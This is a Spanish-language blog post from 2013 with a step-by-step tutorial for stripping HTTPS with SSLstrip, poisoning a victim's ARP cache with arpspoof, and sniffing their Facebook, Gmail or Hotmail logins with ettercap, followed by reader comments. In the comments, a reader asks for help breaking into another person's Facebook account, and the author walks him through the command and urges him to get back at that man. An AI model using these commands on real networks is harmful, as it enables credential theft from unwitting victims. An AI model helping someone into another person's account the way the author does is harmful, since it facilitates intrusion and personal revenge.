miércoles, 6 de marzo de 2013

SSLstrip "Penetrando el protocolo supuestamente seguro" (SSL)


Bueno en el siguiente tutorial, veremos como penetrar el protocolo SSL (https), primero que todo  que es SSL?
  • El protocolo SSL es un sistema de seguridad desarrollado etscape y utilizado actualmente por la mayoría de empresas que comercian a través de Internet. Es un sistema de seguridad ideado para acceder a un servidor garantizando la confidencialidad de los datos mediante técnicas de encarnación modernas.
Sabiendo el significado de este protocolo, pasaremos a la tool que nos permitira violar esta "seguridad".

La herramienta que utilizaremos para la penetracion tiene por nombre "SSLstrip"



Extraemos el archivo : tar zxvf  sslstrip-0.9.tar.gz

Vamos a nuestra consola : cd Desktop (si dejamos el archivo en escritorio)
                                             cd sslstrip-0.9
                                             sudo python ./setup.py install



Luego de esto abriremos otra consola : cd /Desktop/sslstrip-0.9 y pondremos lo siguiente: 

- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
- python sslstrip.py -p -l 1000


Con esto tendremos andando el sslstrip :D
(no cerramos la terminal solo minimizar)

Vamos a : cd /Desktop/sslstrip-0.9
                  tail -f sslstrip.log

Dejamos abierta esta consola tambien...

Luego de esto abriremos una consola y pondremos " ifconfig "



Luego de esto necesitamos 2 ips, la nuestra y la remota (a la cual realizaremos el ataque al protocolo SSL)



Una vez teniendo las 2 ip, haremos correr el Arpspoof

En una nueva terminal pondremos :

- arpspoof -i (interface: "eth0 - wlan -t <victima > <gatewayIP>
- arpspoof -i eth0 -t 192.168.137.1 192.168.137.107


Si todo sale bien, empezaremos a correr nuestro Sniffer en este caso Ettercap

- ettercap -Tq -i eth0

Luego de esto solo queda esperar a que se logee por ejemplo facebook, gmail, hotmail o paginas que utlizen el htttps y buala :D 


Share:

3 comentarios:

  1. Hola, he ocupado una ves backtrack y fue para sacar un pass del internet de mi vecino, a la cemana pague el mio y todo bien, encontre tu blog por suerte en busca de ha.c-k´´ear una cuenta de face book, piblicaron una foto mia donde voy a tener problemas si se entera mi esposa, mi devilidad son las mujeres, y nececito quitar esa foto de esa cuenta, esto me puede serbir?.

    Posdata. En una nueva terminal pondremos :

    - arpspoof -i (interface: "eth0 - wlan -t
    - arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

    en donde dice victima ahi pongo www.facebook.com o el nick de la cuenta de la persona que puso mi foto?.

    Grasias de anterrespuesta

    ResponderEliminar
    Respuestas
    1. corrijo mi pregunta

      En una nueva terminal pondremos :

      - arpspoof -i (interface: "eth0 - wlan -t
      - arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

      Eliminar
    2. Asi es, arpspoof -i eth0 -t 192.168.137.1 192.168.137.107

      recuerda poner correctamente tu interfaz(etho, wlan0, etc),
      a la vez te paso a dejar un video para que lo entiendas mejor,
      no es creado por mi, pero espero te sirva:
      http://www.youtube.com/watch?v=_rNlOmbhlQU (aunque no concuerdo con el titulo de ese video ^^)
      ojala se solucione tu problema, y a la vez intenta otras formas para joderte a ese tio

      Saludos !


      Eliminar

Labels

Analisis (6) Android (1) Auditoria (15) BruteFoce (7) centOS (1) Cloudflare (3) DDos (1) Distros (5) Exploits (3) firewall (1) hacking (11) Herramientas (126) Incapsula (1) lfi (1) Malware (2) Pentest (49) Perl (2) Proxys (1) python (10) Scan Sql (1) Seguridad (52) Windows (1) Wireless (5) Wordpress (1) XSS (5)

FOLLOWME


Translate

Followers